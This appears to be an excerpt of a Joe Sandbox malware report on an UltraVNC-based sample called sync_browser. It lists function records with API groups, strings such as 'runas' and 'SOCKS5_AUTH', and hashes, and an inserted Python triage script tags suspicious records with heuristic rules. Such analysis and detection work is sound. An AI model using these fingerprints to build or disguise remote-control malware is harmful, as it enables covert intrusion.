                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorLastValue$CurrentSleepThread_errno_invalid_parameter_noinfo
                                                                    • String ID: ;$;$JanFebMarAprMayJunJulAugSepOctNovDec$gfff
                                                                    • API String ID: 1962487656-880385205
                                                                    • Opcode ID: e0d79e7de24b8caf00c283af6be9bb86cffb6513b752dbb336f62d487cff5387
                                                                    • Instruction ID: 2bb1f59e6f0ec21480e31c9059a675370b9af92738399169bd6b1dd4a2126de2
                                                                    • Opcode Fuzzy Hash: e0d79e7de24b8caf00c283af6be9bb86cffb6513b752dbb336f62d487cff5387
                                                                    • Instruction Fuzzy Hash: F891F5336081958BEB098A38C894BAC3FE6DB61705F08C136DA48CB796DE3DE51BC741
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: recv$send$_errno_invalid_parameter_noinfo_wgetenv
                                                                    • String ID: SOCKS5_AUTH
                                                                    • API String ID: 788663964-1698957378
                                                                    • Opcode ID: a52017378aba2792d1574ce981dd4d2621b7e1f64bedfacb3fbf5eec73a6fd49
                                                                    • Instruction ID: ee9c156e07fe44ead0339a145f14e613118399a2c969c02bcddf4a38cdf57570
                                                                    • Opcode Fuzzy Hash: a52017378aba2792d1574ce981dd4d2621b7e1f64bedfacb3fbf5eec73a6fd49
                                                                    • Instruction Fuzzy Hash: C481062261C64680EB618729EA406BE6691EFC5794F441233ED5EC7AC9EF2DD426C710
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: closesocketfreeinet_addrinet_ntoa$Startup_wgetenvconnectgethostbynamehtonssocket
                                                                    • String ID: 0123456789.
                                                                    • API String ID: 1515065793-2088042752
                                                                    • Opcode ID: af07b22a9e71188c15fa9fdd567796de41b23474eb50f39214d76554fd7e1c69
                                                                    • Instruction ID: 32b9271dbbeb440523524044c2f7d8fb5865439200f19c751007a8132764cf38
                                                                    • Opcode Fuzzy Hash: af07b22a9e71188c15fa9fdd567796de41b23474eb50f39214d76554fd7e1c69
                                                                    • Instruction Fuzzy Hash: 0B416571A046998AEF309F21DD442FD2290EF88BA9F044236D92D877D5EF3DE5678710
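As an added example (not part of the Joe Sandbox report and not the sample's own code), the script below parses function records in the form they take on this page, splits the "$"-joined String IDs back into individual strings, and tags the records whose API and string combinations an analyst would pull out first: the ShellExecute call carrying the `runas` verb, the recv/send routine that reads `SOCKS5_AUTH` from the environment, the `!UVNCDIR-`/`.zip` path builder behind the UltraVNC file transfer, and the `GetNativeSystemInfo` lookup from kernel32.dll. The sample records are copied from the records above; the rule names and the heuristics are this example's own assumptions, not Joe Sandbox signatures.

```python
"""Parse Joe Sandbox IDA-plugin function records (the "Similarity" blocks on
this report page) and tag the ones whose API/string mix is worth triaging.

The records below are copied from this page; the tagging rules are this
example's own heuristics, not anything Joe Sandbox or UltraVNC ships."""
import re

# Five records as rendered on the page ("$" joins multiple strings / API groups).
SAMPLE_RECORDS = """\
• API ID: _errno_invalid_parameter_noinfo$AllocGlobalPathTempsprintf
• String ID: !UVNCDIR-$%s%s%s%s$.zip$\\*.*
• API String ID: 3897446562-3886131270
• Opcode ID: 2dc71b03babb7fd5399608604822ef7cdffab7c460b881fcd3b864ae7abfc419
• Instruction ID: 9acb818ab9eac09f5fcd20581fa2aee7471054819e9f9d3e7f6ae190c38fb8ce
• API ID: Version$AddressHandleInfoModuleProcSystem
• String ID: GetNativeSystemInfo$kernel32.dll
• API String ID: 335284197-192647395
• Opcode ID: bd6ae27e489f82f31fcc2b20e4ae8107fd534e528a9ba4d17229ed8c41967507
• Instruction ID: b27c6d93e8c1125d37aa0147470b9b3d8b15c517df6256cd72977136d37d6c12
• API ID: ExecuteFileForegroundModuleNameShellVersionWindow
• String ID: -softwarecad$p$runas
• API String ID: 397093096-2208381721
• Opcode ID: fb4efa84501b81446d58e4aa4c9b0a5607d51e55c45e595c5f15ef2dbf94494a
• Instruction ID: b4198d1bb480ffb3d0290b10e1700d8863a49bb21ef67f7434a55f5dc0ec22eb
• API ID: recv$send$_errno_invalid_parameter_noinfo_wgetenv
• String ID: SOCKS5_AUTH
• API String ID: 788663964-1698957378
• Opcode ID: a52017378aba2792d1574ce981dd4d2621b7e1f64bedfacb3fbf5eec73a6fd49
• Instruction ID: ee9c156e07fe44ead0339a145f14e613118399a2c969c02bcddf4a38cdf57570
• API ID: _set_error_mode$CriticalSection_errno$CountExitFileInitializeLeaveModuleNameProcessSleepSpin_lockfreemalloc
• String ID:
• API String ID: 113790786-0
• Opcode ID: ab297a067351a709e4edac81291c778a22c0a59f8ebf175c2e86f69f3e49f6c1
• Instruction ID: 1fbae02904d94ade5958b7420fdc933bb1a428092d63d238a862eefa40246981
"""

# One "• Key: value" line; the key stops at the first colon, value may be empty.
FIELD_RE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z ]+?):\s*(?P<value>.*?)\s*$")


def parse_records(text):
    """Group consecutive field lines into records; each 'API ID' line opens a new one."""
    records, current = [], None
    for line in text.splitlines():
        m = FIELD_RE.match(line)
        if not m:
            continue
        key, value = m.group("key"), m.group("value")
        if key == "API ID":
            current = {}
            records.append(current)
        if current is None:
            continue  # stray field before the first record header
        current[key] = value
    for rec in records:
        raw = rec.get("String ID", "")
        rec["strings"] = raw.split("$") if raw else []  # empty String ID -> no strings
    return records


# Heuristic rules (this example's assumptions): tag -> predicate over one record.
RULES = [
    ("shell-execute-runas",
     lambda r: "runas" in r["strings"]
     and "Shell" in r["API ID"] and "Execute" in r["API ID"]),
    ("socks5-proxy-creds-from-env",
     lambda r: "SOCKS5_AUTH" in r["strings"] and "_wgetenv" in r["API ID"]),
    ("uvnc-filetransfer-zip",
     lambda r: any(s.startswith("!UVNCDIR-") for s in r["strings"])
     and ".zip" in r["strings"]),
    ("runtime-api-resolution",
     lambda r: "kernel32.dll" in r["strings"]
     and "GetNativeSystemInfo" in r["strings"] and "Proc" in r["API ID"]),
]


def triage(records):
    """Return {Opcode ID: [tags]} for every record that trips at least one rule."""
    hits = {}
    for rec in records:
        tags = [tag for tag, pred in RULES if pred(rec)]
        if tags:
            hits[rec["Opcode ID"]] = tags
    return hits


if __name__ == "__main__":
    for opcode_id, tags in triage(parse_records(SAMPLE_RECORDS)).items():
        print(opcode_id[:16], ", ".join(tags))
```

The Opcode ID is used as the record key because the page repeats it as the Opcode Fuzzy Hash, so a tag list keyed on it can be joined back to any other function record that carries the same value in a different report of this family.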
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalSection$InitializeLeave$EnterExceptionRaisemalloc
                                                                    • String ID: P$vncclient.cpp : init update thread
                                                                    • API String ID: 1414418286-2218817233
                                                                    • Opcode ID: a2ddf4542d68b33c97d8dd45c1d4527320b6cb60f175d7e18664f7ad04aba2c8
                                                                    • Instruction ID: 29862da80fc6c96ac115dc12aa92f2aae624ade5b7c76af6800215169e767a3a
                                                                    • Opcode Fuzzy Hash: a2ddf4542d68b33c97d8dd45c1d4527320b6cb60f175d7e18664f7ad04aba2c8
                                                                    • Instruction Fuzzy Hash: 4A417432619B9586E7548F21E9443ADB3A4FB84B90F044136DB9D83B94DF3CE476C700
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalSection$EnterInitializeLeaveSleep
                                                                    • String ID: keyEvent$start_event$stop_event
                                                                    • API String ID: 2894921085-1979648887
                                                                    • Opcode ID: 5e942cff42221011ccb8e3385eb1f8bb143b44ab75859811ab11e89d6bfbc5a3
                                                                    • Instruction ID: 2522bcc55f9047550e4f6eaa720b44a282b8fda73fad17b8fd279890f740e4b0
                                                                    • Opcode Fuzzy Hash: 5e942cff42221011ccb8e3385eb1f8bb143b44ab75859811ab11e89d6bfbc5a3
                                                                    • Instruction Fuzzy Hash: B0417920E2DB5B82FA119B18E95077C2390AFD8754F400136D94EC7BA6CF7EA4A7CB41
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: LibraryMetricsSystem$DisplayEnumSettings$AddressFreeLoadProc
                                                                    • String ID:
                                                                    • API String ID: 3112530957-0
                                                                    • Opcode ID: 8e670c82803b1e3d87f37cd23dd2564999404595f46980b38d1fcce0b4863635
                                                                    • Instruction ID: dc6bd0cf9a5291e367092d5d4bd92620417b037e55692f61bc9c1c95192efece
                                                                    • Opcode Fuzzy Hash: 8e670c82803b1e3d87f37cd23dd2564999404595f46980b38d1fcce0b4863635
                                                                    • Instruction Fuzzy Hash: F441F7769086C58AE324DF38E8447ADBBA4F748B18F044936EA6D97748DF3CD5058F10
                                                                    APIs
                                                                      • Part of subcall function 00007FF6DC177BF0: GetSystemTimeAsFileTime.KERNEL32(?,?,?,00007FF6DC113771), ref: 00007FF6DC177BFE
                                                                    • GetLastError.KERNEL32 ref: 00007FF6DC113790
                                                                    • SetLastError.KERNEL32 ref: 00007FF6DC1137B2
                                                                    • FormatMessageA.KERNEL32 ref: 00007FF6DC1137EB
                                                                    • sprintf.LIBCMT ref: 00007FF6DC113804
                                                                      • Part of subcall function 00007FF6DC17B240: _errno.LIBCMT ref: 00007FF6DC17B258
                                                                      • Part of subcall function 00007FF6DC17B240: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6DC17B263
                                                                      • Part of subcall function 00007FF6DC113690: OutputDebugStringA.KERNEL32(?,?,?,?,?,00007FF6DC11385F), ref: 00007FF6DC1136A9
                                                                      • Part of subcall function 00007FF6DC113690: GetStdHandle.KERNEL32(?,?,?,?,?,00007FF6DC11385F), ref: 00007FF6DC1136D1
                                                                      • Part of subcall function 00007FF6DC113690: WriteConsoleA.KERNEL32 ref: 00007FF6DC1136EE
                                                                      • Part of subcall function 00007FF6DC113690: WriteFile.KERNEL32(?,?,?,?,?,00007FF6DC11385F), ref: 00007FF6DC113725
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorFileLastTimeWrite$ConsoleDebugFormatHandleMessageOutputStringSystem_errno_invalid_parameter_noinfosprintf
                                                                    • String ID: --$error code 0x%08X
                                                                    • API String ID: 1897734068-3878996968
                                                                    • Opcode ID: efd08b52188bb8304a99cb4b7993a8a97ecc2afbd75597a5911adc055181aade
                                                                    • Instruction ID: b7174e87be2a4003c12027297e1800d5a248a807898d803b1909d2b57bec3c45
                                                                    • Opcode Fuzzy Hash: efd08b52188bb8304a99cb4b7993a8a97ecc2afbd75597a5911adc055181aade
                                                                    • Instruction Fuzzy Hash: A631C672B08A9581EB20DB25E8143AE6764FB85BA4F544336EB6D876C9DF3CD4278700
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: __doserrno_errno
                                                                    • String ID:
                                                                    • API String ID: 921712934-0
                                                                    • Opcode ID: 32eb1db604c35a1bd73017e45f5c353669c4e319d3a98b1b574dd58bb646ad4a
                                                                    • Instruction ID: c0ca22f6200d0e65edc1a397300e78782fa7f954e9b64864c12ac6dd93108fe0
                                                                    • Opcode Fuzzy Hash: 32eb1db604c35a1bd73017e45f5c353669c4e319d3a98b1b574dd58bb646ad4a
                                                                    • Instruction Fuzzy Hash: 05210E22E1866E86E6117F24DC4137E26186F81B60F490233FA1C873D2CE7CA863E720
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExecuteFileModuleNameShellfclose
                                                                    • String ID: \uvnckeyboardhelper.exe$p$runas
                                                                    • API String ID: 3322125093-2954907143
                                                                    • Opcode ID: 037d2c38e5ac395d24b8413dad22403111c8ed725fed3ca7cb3e142dbe59519c
                                                                    • Instruction ID: 8c50e03d9035e9dca1009052d93e5e42bd165f69c576c632c3ddfe6dc1f231b3
                                                                    • Opcode Fuzzy Hash: 037d2c38e5ac395d24b8413dad22403111c8ed725fed3ca7cb3e142dbe59519c
                                                                    • Instruction Fuzzy Hash: 0D311E31A0CB9685EB659B10F8513AE73A8FB88754F404237DA9D83B95DF3CE126CB00
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: __doserrno_close_nolock_errno
                                                                    • String ID:
                                                                    • API String ID: 186997739-0
                                                                    • Opcode ID: 0c6e4c21da35182ad9278105eade7e0fa1460cea4b5bf11609be99456b1b247b
                                                                    • Instruction ID: e4cae65a9f308273dcc3df24c2ec45d91e8694c3f583e4262015c2465dba32cc
                                                                    • Opcode Fuzzy Hash: 0c6e4c21da35182ad9278105eade7e0fa1460cea4b5bf11609be99456b1b247b
                                                                    • Instruction Fuzzy Hash: E4110F22E0C2AACAF2016F24EC4137D2698BF817A0F594577F51DC76C2CE3CA862D310
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Desktop$Thread$CloseCurrentInputMessageOpen
                                                                    • String ID:
                                                                    • API String ID: 1973726940-0
                                                                    • Opcode ID: 74b4376dc008a2e3deaa89793efa6c2b5ae9ae972eae381437ecec0259b7ff16
                                                                    • Instruction ID: 180ed23018d4fd56df024a7a3b09c238cdfa48ec3bb4504805b5305e098cc67a
                                                                    • Opcode Fuzzy Hash: 74b4376dc008a2e3deaa89793efa6c2b5ae9ae972eae381437ecec0259b7ff16
                                                                    • Instruction Fuzzy Hash: 2611AF25B1DB6982EB149B62B84452DA2A0BB4DFD0F18043AEE5EC3B54CF3DD463C700
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmp
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Timer$KillMessageModePostQuitWindow
                                                                    • String ID: d
                                                                    • API String ID: 3664928928-2564639436
                                                                    • Opcode ID: 118553bd85ce4610845fc2bc57698abad58593aa61c72bc6e801eda45dbd9551
